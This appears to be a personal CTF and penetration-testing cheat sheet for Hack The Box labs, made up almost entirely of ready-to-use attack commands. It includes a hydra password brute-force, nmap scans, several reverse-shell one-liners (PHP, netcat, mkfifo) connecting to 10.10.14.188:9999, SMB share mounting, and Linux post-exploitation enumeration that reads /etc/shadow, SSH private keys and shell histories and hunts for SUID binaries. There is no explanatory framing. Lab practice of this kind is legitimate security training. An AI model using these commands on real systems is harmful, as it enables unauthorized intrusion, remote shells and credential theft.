hydra docker.hackthebox.eu -s 31683 http-post-form "/:password=^PASS^:F=Invalid password!" -l '' -P Bureau/CTFs/Rootme/Worstpass/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt -w 1 -V

scan : 

sudo nmap -A -sS 10.10.10.140 -vvvvv
sudo nmap -sS 10.10.10.140 -p 4000-10000 -vvvvv

Reverse-Shell : 

php: 
l=  nc -v -n -l -p 9999
c= php-reverse-shell.php
c = echo "<?php exec('/bin/bash -c \\'bash -i > /dev/tcp/10.10.14.188/9999 0>&1\\'');?>" > bash.php
    <?php exec('/bin/bash -c \'bash -i > /dev/tcp/10.10.14.188/9999 0>&1\'');?>

netcat:
l= netcat -l -q0 -p 9999
c= nc -e /bin/sh 10.10.14.188 9999
   /bin/nc.traditional -e /bin/sh 10.10.14.188 9999
   ou
   rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.188 9999 >/tmp/f

Blockchain: 

rpc-check http://10.10.10.142:9810


SMB: 

smbclient -L -N //10.10.10.134/Backups 
sudo mount -t cifs //10.10.10.134/Backups/ -o user=,password= /mnt/remote -o rw

.vhd:

sudo guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v
 
Linux enum: 

Distribution type/version? 
cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat based

Kernel version?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env

Is there a printer?
lpstat -a

Services/Privileges? 
sudo -l
ps aux | grep root
ps -ef | grep root
cat /etc/services

Applications? 
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Misconfigured? vulnerable plugins attached? 
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

Jobs scheduled? 
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Who are you? Who is logged in? Who has been logged in? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

Plain text usernames and/or passwords? 
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

What have they been editng? 
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What sensitive files can be found? 
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Private key?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

Able to reconfigure a service in /etc?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other
find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

If commands are limited?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded? 
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

set uid bit? 
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;


